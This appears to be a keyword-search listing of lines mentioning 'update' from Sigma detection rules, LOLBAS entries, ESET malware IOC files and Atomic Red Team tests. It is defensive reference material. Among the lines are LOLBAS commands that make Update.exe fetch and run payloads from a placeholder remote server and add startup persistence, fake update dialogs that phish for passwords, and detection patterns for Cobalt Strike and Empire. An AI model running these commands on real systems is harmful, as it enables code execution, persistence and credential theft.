| sigma |
av_printernightmare_cve_2021_34527.yml |
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675 |
DRL 1.0 |
| sigma |
av_printernightmare_cve_2021_34527.yml |
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527 |
DRL 1.0 |
| sigma |
rpc_firewall_efs_abuse.yml |
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942 |
DRL 1.0 |
| sigma |
rpc_firewall_printing_lateral_movement.yml |
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527 |
DRL 1.0 |
| sigma |
azure_aadhybridhealth_adfs_new_server.yml |
This detection uses AzureActivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid health AD FS service. |
DRL 1.0 |
| sigma |
azure_app_credential_modification.yml |
properties.message: 'Update application - Certificates and secrets management' |
DRL 1.0 |
| sigma |
azure_device_or_configuration_modified_or_deleted.yml |
- Update device |
DRL 1.0 |
| sigma |
azure_device_or_configuration_modified_or_deleted.yml |
- Update device configuration |
DRL 1.0 |
| sigma |
azure_keyvault_key_modified_or_deleted.yml |
- MICROSOFT.KEYVAULT/VAULTS/KEYS/UPDATE/ACTION |
DRL 1.0 |
| sigma |
azure_keyvault_secrets_modified_or_deleted.yml |
- MICROSOFT.KEYVAULT/VAULTS/SECRETS/UPDATE/ACTION |
DRL 1.0 |
| sigma |
gcp_bucket_modified_or_deleted.yml |
- storage.buckets.update |
DRL 1.0 |
| sigma |
gcp_dns_zone_modified_or_deleted.yml |
- Dns.ManagedZones.Update |
DRL 1.0 |
| sigma |
gcp_firewall_rule_modified_or_deleted.yml |
- v*.Compute.Firewalls.Update |
DRL 1.0 |
| sigma |
gcp_kubernetes_rolebinding.yml |
- io.k8s.authorization.rbac.v*.clusterrolebindings.update |
DRL 1.0 |
| sigma |
gcp_kubernetes_rolebinding.yml |
- io.k8s.authorization.rbac.v*.rolebindings.update |
DRL 1.0 |
| sigma |
gcp_kubernetes_secrets_modified_or_deleted.yml |
- io.k8s.core.v*.secrets.update |
DRL 1.0 |
| sigma |
gcp_service_account_modified.yml |
- .serviceAccounts.update |
DRL 1.0 |
| sigma |
gcp_sql_database_modified_or_deleted.yml |
- https://cloud.google.com/sql/docs/mysql/admin-api/rest/v1beta4/users/update |
DRL 1.0 |
| sigma |
gcp_sql_database_modified_or_deleted.yml |
- cloudsql.users.update |
DRL 1.0 |
| sigma |
okta_application_modified_or_deleted.yml |
- application.lifecycle.update |
DRL 1.0 |
| sigma |
okta_application_sign_on_policy_modified_or_deleted.yml |
- application.policy.sign_on.update |
DRL 1.0 |
| sigma |
okta_policy_modified_or_deleted.yml |
- policy.lifecycle.update |
DRL 1.0 |
| sigma |
okta_policy_rule_modified_or_deleted.yml |
- policy.rule.update |
DRL 1.0 |
| sigma |
proc_creation_lnx_install_root_certificate.yml |
- '/update-ca-certificates' |
DRL 1.0 |
| sigma |
proc_creation_lnx_install_root_certificate.yml |
- '/update-ca-trust' |
DRL 1.0 |
| sigma |
zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml |
- https://msrc.microsoft.com/update-guide/vulnerability/ADV210003 |
DRL 1.0 |
| sigma |
zeek_dce_rpc_printnightmare_print_driver_install.yml |
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527 |
DRL 1.0 |
| sigma |
zeek_smb_converted_win_lm_namedpipe.yml |
- update the excluded named pipe to filter out any newly observed legit named pipe |
DRL 1.0 |
| sigma |
proxy_susp_flash_download_loc.yml |
title: Flash Player Update from Suspicious Location |
DRL 1.0 |
| sigma |
proxy_susp_flash_download_loc.yml |
description: Detects a flashplayer update from an unofficial location |
DRL 1.0 |
| sigma |
proxy_ua_apt.yml |
- 'Mozilla v5.1 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1' # Delphi downloader https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/ |
DRL 1.0 |
| sigma |
proxy_ua_bitsadmin_susp_tld.yml |
- Rare programs that use Bitsadmin and update from regional TLDs e.g. .uk or .ca |
DRL 1.0 |
| sigma |
proxy_ua_frameworks.yml |
# Metasploit Update by Florian Roth 08.07.2017 |
DRL 1.0 |
| sigma |
win_exchange_cve_2021_42321.yml |
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42321 |
DRL 1.0 |
| sigma |
win_lm_namedpipe.yml |
- update the excluded named pipe to filter out any newly observed legit named pipe |
DRL 1.0 |
| sigma |
win_security_mal_service_installs.yml |
author: Florian Roth, Daniil Yugoslavskiy, oscd.community (update) |
DRL 1.0 |
| sigma |
win_susp_lsass_dump_generic.yml |
author: Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update) |
DRL 1.0 |
| sigma |
win_susp_lsass_dump_generic.yml |
- Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it |
DRL 1.0 |
| sigma |
win_susp_system_update_error.yml |
title: Windows Update Error |
DRL 1.0 |
| sigma |
win_susp_system_update_error.yml |
description: Windows Update get some error Check if need a 0-days KB |
DRL 1.0 |
| sigma |
win_susp_system_update_error.yml |
- 20 # Installation Failure: Windows failed to install the following update with error |
DRL 1.0 |
| sigma |
win_susp_system_update_error.yml |
- 24 # Uninstallation Failure: Windows failed to uninstall the following update with error |
DRL 1.0 |
| sigma |
win_susp_system_update_error.yml |
- 213 # Revert Failure: Windows failed to revert the following update with error |
DRL 1.0 |
| sigma |
win_susp_system_update_error.yml |
- 217 # Commit Failure: Windows failed to commit the following update with error |
DRL 1.0 |
| sigma |
sysmon_rclone_execution.yml |
- https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html |
DRL 1.0 |
| sigma |
driver_load_vuln_dell_driver.yml |
title: Vulnerable Dell BIOS Update Driver Load |
DRL 1.0 |
| sigma |
driver_load_vuln_dell_driver.yml |
description: Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551 |
DRL 1.0 |
| sigma |
file_event_win_powershell_exploit_scripts.yml |
- '\Remove-Update.ps1' |
DRL 1.0 |
| sigma |
image_load_susp_system_drawing_load.yml |
- 'C:\Users\\*\GitHubDesktop\Update.exe' |
DRL 1.0 |
| sigma |
net_connection_win_wuauclt_network_connection.yml |
description: Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making a network connections. One could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule. |
DRL 1.0 |
| sigma |
pipe_created_mal_cobaltstrike_re.yml |
- PipeName\|re: '\\\\windows\.update\.manager[0-9a-f]{2,3}' |
DRL 1.0 |
| sigma |
pipe_created_susp_cobaltstrike_pipe_patterns.yml |
- '\windows.update.manager' |
DRL 1.0 |
| sigma |
posh_ps_malicious_commandlets.yml |
author: Sean Metcalf (source), Florian Roth (rule), Bartlomiej Czyz @bczyz1 (update), oscd.community (update) |
DRL 1.0 |
| sigma |
posh_ps_malicious_commandlets.yml |
- 'Remove-Update' |
DRL 1.0 |
| sigma |
posh_ps_nishang_malicious_commandlets.yml |
- Remove-Update |
DRL 1.0 |
| sigma |
proc_access_win_cred_dump_lsass_access.yml |
oscd.community (update) |
DRL 1.0 |
| sigma |
proc_access_win_in_memory_assembly_execution.yml |
- '\GitHubDesktop\Update.exe' |
DRL 1.0 |
| sigma |
proc_creation_win_apt_revil_kaseya.yml |
- https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/ |
DRL 1.0 |
| sigma |
proc_creation_win_dsim_remove.yml |
description: Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images |
DRL 1.0 |
| sigma |
proc_creation_win_etw_trace_evasion.yml |
- 'update' |
DRL 1.0 |
| sigma |
proc_creation_win_exploit_cve_2019_1378.yml |
- https://www.embercybersecurity.com/blog/cve-2019-1378-exploiting-an-access-control-privilege-escalation-vulnerability-in-windows-10-update-assistant-wua |
DRL 1.0 |
| sigma |
proc_creation_win_lolbas_execution_of_wuauclt.yml |
description: Adversaries can abuse wuauclt.exe (Windows Update client) to run code execution by specifying an arbitrary DLL. |
DRL 1.0 |
| sigma |
proc_creation_win_lolbas_execution_of_wuauclt.yml |
- Wuaueng.dll which is a module belonging to Microsoft Windows Update. |
DRL 1.0 |
| sigma |
proc_creation_win_msiexec_execute_dll.yml |
- '\MsiExec.exe" /Y "C:\Program Files (x86)\Apple Software Update\ScriptingObjectModel.dll' |
DRL 1.0 |
| sigma |
proc_creation_win_msiexec_execute_dll.yml |
- '\MsiExec.exe" /Y "C:\Program Files (x86)\Apple Software Update\SoftwareUpdateAdmin.dll' |
DRL 1.0 |
| sigma |
proc_creation_win_proxy_execution_wuauclt.yml |
description: Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code. |
DRL 1.0 |
| sigma |
proc_creation_win_proxy_execution_wuauclt.yml |
- https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/ |
DRL 1.0 |
| sigma |
proc_creation_win_rasautou_dll_execution.yml |
definition: Since options '-d' and '-p' were removed in Windows 10 this rule is relevant only for Windows before 10. And as Windows 7 doesn't log command line in 4688 by default, to detect this attack you need Sysmon 1 configured or KB3004375 installed for command-line auditing (https://support.microsoft.com/en-au/help/3004375/microsoft-security-advisory-update-to-improve-windows-command-line-aud) |
DRL 1.0 |
| sigma |
proc_creation_win_renamed_jusched.yml |
Description: Java Update Scheduler |
DRL 1.0 |
| sigma |
proc_creation_win_renamed_jusched.yml |
Description: Java(TM) Update Scheduler |
DRL 1.0 |
| sigma |
proc_creation_win_susp_control_cve_2021_40444.yml |
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444 |
DRL 1.0 |
| sigma |
proc_creation_win_susp_powershell_empire_uac_bypass.yml |
- ' -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update)' |
DRL 1.0 |
| sigma |
proc_creation_win_susp_powershell_empire_uac_bypass.yml |
- ' -NoP -NonI -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update);' |
DRL 1.0 |
| sigma |
proc_creation_win_susp_rclone_execution.yml |
- https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html |
DRL 1.0 |
| sigma |
proc_creation_win_susp_squirrel_lolbin.yml |
Image\|endswith: '\update.exe' # Check if folder Name matches executed binary \\(?P<first>[^\\]*)\\Update.*Start.{2}(?P<second>\1)\.exe (example: https://regex101.com/r/SGSQGz/2) |
DRL 1.0 |
| sigma |
proc_creation_win_susp_squirrel_lolbin.yml |
- '\AppData\Local\Discord\Update.exe' |
DRL 1.0 |
| sigma |
proc_creation_win_susp_wuauclt.yml |
title: Windows Update Client LOLBIN |
DRL 1.0 |
| sigma |
proc_creation_win_susp_wuauclt.yml |
description: Detects code execution via the Windows Update client (wuauclt) |
DRL 1.0 |
| sigma |
proc_creation_win_susp_wuauclt_cmdline.yml |
title: Suspicious Windows Update Agent Empty Cmdline |
DRL 1.0 |
| sigma |
proc_creation_win_susp_wuauclt_cmdline.yml |
description: Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags |
DRL 1.0 |
| sigma |
proc_creation_win_uac_bypass_ntfs_reparse_point.yml |
CommandLine\|endswith: '\AppData\Local\Temp\update.msu' |
DRL 1.0 |
| sigma |
registry_event_asep_reg_keys_modification_currentversion.yml |
- '\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe' # C:\Users\*\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe |
DRL 1.0 |
| sigma |
registry_event_office_enable_dde.yml |
- https://msrc.microsoft.com/update-guide/vulnerability/ADV170021 |
DRL 1.0 |
| sigma |
registry_event_taskcache_entry.yml |
- '\TaskCache\Tree\OneDrive Standalone Update Task' |
DRL 1.0 |
| sigma |
registry_event_taskcache_entry.yml |
- '\TaskCache\Tree\Mozilla\Firefox Background Update ' |
DRL 1.0 |
| sigma |
registry_event_wdigest_enable_uselogoncredential.yml |
- https://support.microsoft.com/en-us/topic/microsoft-security-advisory-update-to-improve-credentials-protection-and-management-may-13-2014-93434251-04ac-b7f3-52aa-9f951c14b649 |
DRL 1.0 |
| sigma |
sysmon_config_modification_error.yml |
- 'Failed to connect to the driver to update configuration' |
DRL 1.0 |
| sigma |
win_apt_apt29_tor.yml |
title: APT29 Google Update Service Install |
DRL 1.0 |
| sigma |
win_apt_apt29_tor.yml |
description: This method detects malicious services mentioned in APT29 report by FireEye. The legitimate path for the Google update service is C:\Program Files (x86)\Google\Update\GoogleUpdate.exe |
DRL 1.0 |
| sigma |
win_apt_apt29_tor.yml |
ServiceName: 'Google Update' |
DRL 1.0 |
| sigma |
win_mal_service_installs.yml |
author: Florian Roth, Daniil Yugoslavskiy, oscd.community (update) |
DRL 1.0 |
| sigma |
win_remote_schtask.yml |
description: Detects remote execution via scheduled task creation or update on the destination host |
DRL 1.0 |
| sigma |
ecs-zeek-elastic-beats-implementation.yml |
nextUpdate: zeek.ocsp.update.next |
DRL 1.0 |
| sigma |
ecs-zeek-elastic-beats-implementation.yml |
thisUpdate: zeek.ocsp.update.this |
DRL 1.0 |
| LOLBAS |
gh-pages.yml |
name: Update LOLBAS-Project.github.io |
|
| LOLBAS |
gh-pages.yml |
commit_message: "Applying update " |
|
| LOLBAS |
Upload.yml |
Name: Update.exe |
|
| LOLBAS |
Upload.yml |
Description: Binary to update the existing installed Nuget/squirrel package. Part of Whatsapp installation. |
|
| LOLBAS |
Upload.yml |
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args" |
|
| LOLBAS |
Upload.yml |
Description: Copy your payload into "%localappdata%\Whatsapp\app-[version]\". Then run the command. Update.exe will execute the file you copied. |
|
| LOLBAS |
Upload.yml |
- Path: '%localappdata%\Whatsapp\Update.exe' |
|
| LOLBAS |
Upload.yml |
- IOC: '"%localappdata%\Whatsapp\Update.exe" spawned an unknown process' |
|
| LOLBAS |
Cmdl32.yml |
- IOC: Useragent Microsoft(R) Connection Manager Vpn File Update |
|
| LOLBAS |
Pktmon.yml |
Description: Capture Network Packets on the windows 10 with October 2018 Update or later. |
|
| LOLBAS |
Wuauclt.yml |
Description: Windows Update Client |
|
| LOLBAS |
Squirrel.yml |
Description: Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation. |
|
| LOLBAS |
Squirrel.yml |
- Command: squirrel.exe --update [url to package] |
|
| LOLBAS |
Squirrel.yml |
- Link: https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56 |
|
| LOLBAS |
Update.yml |
Name: Update.exe |
|
| LOLBAS |
Update.yml |
Description: Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation. |
|
| LOLBAS |
Update.yml |
- Command: Update.exe --download [url to package] |
|
| LOLBAS |
Update.yml |
- Command: Update.exe --update=[url to package] |
|
| LOLBAS |
Update.yml |
- Command: Update.exe --update=\\remoteserver\payloadFolder |
|
| LOLBAS |
Update.yml |
- Command: Update.exe --updateRollback=[url to package] |
|
| LOLBAS |
Update.yml |
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args" |
|
| LOLBAS |
Update.yml |
Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied. |
|
| LOLBAS |
Update.yml |
- Command: Update.exe --updateRollback=\\remoteserver\payloadFolder |
|
| LOLBAS |
Update.yml |
- Command: Update.exe --createShortcut=payload.exe -l=Startup |
|
| LOLBAS |
Update.yml |
Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it. |
|
| LOLBAS |
Update.yml |
- Command: Update.exe --removeShortcut=payload.exe -l=Startup |
|
| LOLBAS |
Update.yml |
- Path: '%localappdata%\Microsoft\Teams\update.exe' |
|
| LOLBAS |
Update.yml |
- IOC: Update.exe spawned an unknown process |
|
| LOLBAS |
Update.yml |
- Link: https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56 |
|
| malware-ioc |
attor |
Adobe Acrobat Update v3.17.lkws |
© ESET 2014-2018 |
| malware-ioc |
attor |
Adobe Acrobat Update Service v3.2.muitnl |
© ESET 2014-2018 |
| malware-ioc |
attor |
%ALLUSERSPROFILE%\Sun\Java\Java Update\Caches\s3x |
© ESET 2014-2018 |
| malware-ioc |
attor |
%ALLUSERSPROFILE%\Sun\Java\Java Update\Caches\d5l |
© ESET 2014-2018 |
| malware-ioc |
attor |
=== Update folder paths |
© ESET 2014-2018 |
| malware-ioc |
attor |
%ALLUSERSPROFILE%\Sun\Java\Java Update\Caches\v1e |
© ESET 2014-2018 |
| malware-ioc |
attor |
%ALLUSERSPROFILE%\Sun\Java\Java Update\Caches\k7f |
© ESET 2014-2018 |
| malware-ioc |
casbaneiro |
=== Campaign 1: Fishy financial manager update |
© ESET 2014-2018 |
| malware-ioc |
cdrthief |
==== Files created during malware update |
© ESET 2014-2018 |
| malware-ioc |
evilnum |
https://api.adobe.com[.]kz/update/check |
© ESET 2014-2018 |
| malware-ioc |
evilnum |
== February 2021 Pyvil and Evilnum Update |
© ESET 2014-2018 |
| malware-ioc |
evilnum |
These are the IOCs for our https://twitter.com/ESETresearch[update on @ESETresearch twitter]. |
© ESET 2014-2018 |
| malware-ioc |
evilnum |
\|AF5F9CD45757F928E5BCC6F50BCD62AAB50119C1\|fsnotifier32.exe \|Google Update Core \|14FDFFEB640F897C120870155F7FB2C8EA62AF44``{:.highlight .language-cmhg} |
© ESET 2014-2018 |
| malware-ioc |
invisimole.yar |
$s17 = "update.xn--6frz82g" ascii wide |
© ESET 2014-2018 |
| malware-ioc |
invisimole.yar |
$s25 = "update.xn--6frz82g" ascii wide |
© ESET 2014-2018 |
| malware-ioc |
misp_invisimole.json |
"value": "update.xn—6frz82g", |
© ESET 2014-2018 |
| malware-ioc |
invisimole |
* update[.]xn–6frz82g``{:.highlight .language-cmhg} |
© ESET 2014-2018 |
| malware-ioc |
misp-kryptocibule.json |
"value": "%ProgramFiles(X86)%\\Adobe\\Acrobat Reader DC\\Reader\\Update\\armsvc.exe", |
© ESET 2014-2018 |
| malware-ioc |
misp-kryptocibule.json |
"value": "%ProgramFiles(X86)%\\Adobe\\Acrobat Reader DC\\Reader\\Update\\firewall.exe", |
© ESET 2014-2018 |
| malware-ioc |
misp-kryptocibule.json |
"value": "%ProgramFiles(X86)%\\Adobe\\Acrobat Reader DC\\Reader\\Update\\ADelRCP.exe", |
© ESET 2014-2018 |
| malware-ioc |
misp-kryptocibule.json |
"value": "%ProgramFiles(X86)%\\Adobe\\Acrobat Reader DC\\Reader\\Update\\SystemArchitectureTranslation.exe", |
© ESET 2014-2018 |
| malware-ioc |
misp-kryptocibule.json |
"value": "%ProgramFiles(X86)%\\Adobe\\Acrobat Reader DC\\Reader\\Update\\libstringutils.dll", |
© ESET 2014-2018 |
| malware-ioc |
misp-kryptocibule.json |
"value": "%ProgramFiles(X86)%\\Adobe\\Acrobat Reader DC\\Reader\\Update\\settings.cfg", |
© ESET 2014-2018 |
| malware-ioc |
misp-kryptocibule.json |
"value": "%ProgramFiles(X86)%\\Adobe\\Acrobat Reader DC\\Reader\\Update\\Setup.dll", |
© ESET 2014-2018 |
| malware-ioc |
misp-kryptocibule.json |
"value": "%ProgramFiles(X86)%\\Adobe\\Acrobat Reader DC\\Reader\\Update\\Updater.exe", |
© ESET 2014-2018 |
| malware-ioc |
misp-kryptocibule.json |
"value": "%ProgramFiles(X86)%\\Adobe\\Acrobat Reader DC\\Reader\\Update\\setup-version.json", |
© ESET 2014-2018 |
| malware-ioc |
misp-kryptocibule.json |
"value": "%ProgramFiles(X86)%\\Adobe\\Acrobat Reader DC\\Reader\\Update\\client-version.dll", |
© ESET 2014-2018 |
| malware-ioc |
misp-kryptocibule.json |
"value": "%ProgramFiles(X86)%\\Adobe\\Acrobat Reader DC\\Reader\\Update\\backup\\", |
© ESET 2014-2018 |
| malware-ioc |
misp-kryptocibule.json |
"value": "%ProgramFiles(X86)%\\Adobe\\Acrobat Reader DC\\Reader\\Update\\backup.log", |
© ESET 2014-2018 |
| malware-ioc |
misp-kryptocibule.json |
"value": "Adobe Update Task", |
© ESET 2014-2018 |
| malware-ioc |
kryptocibule |
%ProgramFiles(X86)%\Adobe\Acrobat Reader DC\Reader\Update\armsvc.exe |
© ESET 2014-2018 |
| malware-ioc |
kryptocibule |
%ProgramFiles(X86)%\Adobe\Acrobat Reader DC\Reader\Update\firewall.exe |
© ESET 2014-2018 |
| malware-ioc |
kryptocibule |
%ProgramFiles(X86)%\Adobe\Acrobat Reader DC\Reader\Update\ADelRCP.exe |
© ESET 2014-2018 |
| malware-ioc |
kryptocibule |
%ProgramFiles(X86)%\Adobe\Acrobat Reader DC\Reader\Update\SystemArchitectureTranslation.exe |
© ESET 2014-2018 |
| malware-ioc |
kryptocibule |
%ProgramFiles(X86)%\Adobe\Acrobat Reader DC\Reader\Update\libstringutils.dll |
© ESET 2014-2018 |
| malware-ioc |
kryptocibule |
%ProgramFiles(X86)%\Adobe\Acrobat Reader DC\Reader\Update\settings.cfg |
© ESET 2014-2018 |
| malware-ioc |
kryptocibule |
%ProgramFiles(X86)%\Adobe\Acrobat Reader DC\Reader\Update\Setup.dll |
© ESET 2014-2018 |
| malware-ioc |
kryptocibule |
%ProgramFiles(X86)%\Adobe\Acrobat Reader DC\Reader\Update\Updater.exe |
© ESET 2014-2018 |
| malware-ioc |
kryptocibule |
%ProgramFiles(X86)%\Adobe\Acrobat Reader DC\Reader\Update\setup-version.json |
© ESET 2014-2018 |
| malware-ioc |
kryptocibule |
%ProgramFiles(X86)%\Adobe\Acrobat Reader DC\Reader\Update\client-version.dll |
© ESET 2014-2018 |
| malware-ioc |
kryptocibule |
%ProgramFiles(X86)%\Adobe\Acrobat Reader DC\Reader\Update\backup\ |
© ESET 2014-2018 |
| malware-ioc |
kryptocibule |
%ProgramFiles(X86)%\Adobe\Acrobat Reader DC\Reader\Update\backup.log |
© ESET 2014-2018 |
| malware-ioc |
kryptocibule |
\|Adobe Update Task\|%ProgramFiles(X86)%\Adobe\Acrobat Reader DC\Reader\Update\armsvc.exe``{:.highlight .language-cmhg} |
© ESET 2014-2018 |
| malware-ioc |
kryptocibule |
Identity Service, in, allow, %ProgramFiles(X86)%\Adobe\Acrobat Reader DC\Reader\Update\firewall.exe |
© ESET 2014-2018 |
| malware-ioc |
kryptocibule |
Identity Service, out, allow, %ProgramFiles(X86)%\Adobe\Acrobat Reader DC\Reader\Update\firewall.exe |
© ESET 2014-2018 |
| malware-ioc |
kryptocibule |
Java Runtime Update, in, allow, %LocalAppData%\Java Runtime\transmission-remote.exe |
© ESET 2014-2018 |
| malware-ioc |
kryptocibule |
Java Runtime Update, out, allow, %LocalAppData%\Java Runtime\transmission-remote.exe |
© ESET 2014-2018 |
| malware-ioc |
moose |
likely update their technique and tools to evade detection and thwart |
© ESET 2014-2018 |
| malware-ioc |
nightscout |
=== Malicious Update variant 1 |
© ESET 2014-2018 |
| malware-ioc |
nightscout |
=== Malicious Update variant 2 |
© ESET 2014-2018 |
| malware-ioc |
nightscout |
=== Malicious Update variant 3 |
© ESET 2014-2018 |
| malware-ioc |
nightscout |
=== Malicious Update variant 4 |
© ESET 2014-2018 |
| malware-ioc |
nightscout |
update.boshiamys[.]com |
© ESET 2014-2018 |
| malware-ioc |
nightscout |
=== Malicious update URLs |
© ESET 2014-2018 |
| malware-ioc |
nukesped_lazarus |
.Update.exe``{:.highlight .language-cmhg} |
© ESET 2014-2018 |
| malware-ioc |
oceanlotus |
== OceanLotus : macOS backdoor update |
© ESET 2014-2018 |
| malware-ioc |
oceanlotus |
For a description of OceanLotus' latest macOS update |
© ESET 2014-2018 |
| malware-ioc |
oceanlotus |
https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/[OceanLotus article]. |
© ESET 2014-2018 |
| malware-ioc |
potao |
likely update their technique and tools to evade detection and thwart |
© ESET 2014-2018 |
| malware-ioc |
2020_Q2 |
== Operation In(ter)ception Update |
© ESET 2014-2018 |
| malware-ioc |
2020_Q3 |
- ++http://www.maxscript.cc/update/upscript[.]mse++``{:.highlight .language-cmhg} |
© ESET 2014-2018 |
| malware-ioc |
2020_Q4 |
update.npicgames[.]com |
© ESET 2014-2018 |
| malware-ioc |
2021_T2 |
library-update[.]com |
© ESET 2014-2018 |
| malware-ioc |
rtm |
Windows Update = rundll32.exe "%PROGRAMDATA%\Winlogon\winlogon.lnk",DllGetClassObject host |
© ESET 2014-2018 |
| malware-ioc |
rtm |
Windows Update |
© ESET 2014-2018 |
| malware-ioc |
sparklinggoblin |
- ++update.facebookint.workers[.]dev++``{:.highlight .language-cmhg} |
© ESET 2014-2018 |
| malware-ioc |
sshdoor |
\|Hash (SHA-1) \|UUID \|C&C \|URL to update C&C\| Backdoor password |
© ESET 2014-2018 |
| malware-ioc |
stantinko |
\|Stantinko Installer \| udservice.exe \| update.ultimate-discounter[.]com |
© ESET 2014-2018 |
| malware-ioc |
stantinko |
HKLM\SYSTEM\CurrentControlSet\services\Coupons Browser Update Service\ |
© ESET 2014-2018 |
| malware-ioc |
stantinko.misp-event.json |
"value": "update.ultimate-discounter.com\|178.20.159.56", |
© ESET 2014-2018 |
| malware-ioc |
stantinko.misp-event.json |
"value": "HKLM\\SYSTEM\\CurrentControlSet\\services\\Coupons Browser Update Service\\", |
© ESET 2014-2018 |
| malware-ioc |
misp-mosquito-event.json |
"value": "http:\/\/get.adobe.com\/flashplayer\/download\/update\/x32", |
© ESET 2014-2018 |
| malware-ioc |
misp-mosquito-event.json |
"value": "http:\/\/get.adobe.com\/flashplayer\/download\/update\/x64", |
© ESET 2014-2018 |
| malware-ioc |
turla |
** FSStorage::Update``{:.highlight .language-cmhg} |
© ESET 2014-2018 |
| malware-ioc |
turla |
** RegStorage::Update``{:.highlight .language-cmhg} |
© ESET 2014-2018 |
| malware-ioc |
turla |
- ++http://get.adobe[.]com/flashplayer/download/update/x32++``{:.highlight .language-cmhg} |
© ESET 2014-2018 |
| malware-ioc |
turla |
- ++http://get.adobe[.]com/flashplayer/download/update/x64++``{:.highlight .language-cmhg} |
© ESET 2014-2018 |
| malware-ioc |
windigo |
*UPDATE 2017-10-30*: This documents now contains the latest IOCs for version |
© ESET 2014-2018 |
| malware-ioc |
windigo |
likely update their technique and tools to evade detection and thwart |
© ESET 2014-2018 |
| malware-ioc |
windigo |
*UPDATE*: As we expected, the malicious group is monitoring our indicators of |
© ESET 2014-2018 |
| malware-ioc |
gaming_supply_chain.misp_event.json |
"comment": "2nd stage update server (HTTP)", |
© ESET 2014-2018 |
| malware-ioc |
gaming_supply_chain.misp_event.json |
"description": "Supply chain compromise is the manipulation of products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise can take place at any stage of the supply chain including:\n\n* Manipulation of development tools\n* Manipulation of a development environment\n* Manipulation of source code repositories (public or private)\n* Manipulation of software update/distribution mechanisms\n* Compromised/infected system images (multiple cases of removable media infected at the factory)\n* Replacement of legitimate software with modified versions\n* Sales of modified/counterfeit products to legitimate distributors\n* Shipment interdiction\n\nWhile supply chain compromise can impact any component of hardware or software, attackers looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels. (Citation: Avast CCleaner3 2018) (Citation: Microsoft Dofoil 2018) (Citation: Command Five SK 2011) Targeting may be specific to a desired victim set (Citation: Symantec Elderwood Sept 2012) or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. (Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011)", |
© ESET 2014-2018 |
| malware-ioc |
winnti_group |
\| checkin.travelsanignacio.com \| Second stage update server |
© ESET 2014-2018 |
| atomic-red-team |
T1056.002.md |
osascript -e ‘tell app “System Preferences” to activate’ -e ‘tell app “System Preferences” to activate’ -e ‘tell app “System Preferences” to display dialog “Software Update requires that you type your password to apply changes.” & return & return default answer “” with icon 1 with hidden answer with title “Software Update”’ |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1056.002.md |
$cred = $host.UI.PromptForCredential(‘Windows Security Update’, ‘’,[Environment]::UserName, [Environment]::UserDomainName) |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1070.md |
Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume. Upon execution, no output |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1110.001.md |
apt-get update && apt-get install -y openssl sudo |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1110.001.md |
yum -y update && yum install -y openssl sudo |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1110.004.md |
if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo apt install sshpass -y; else echo “This test requires sshpass” ; fi ; |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1176.md |
Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners.(Citation: Malicious Chrome Extension Numbers) Depending on the browser, adversaries may also manipulate an extension’s update url to install updates from an adversary controlled server or manipulate the mobile configuration file to silently install additional extensions. |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1543.002.md |
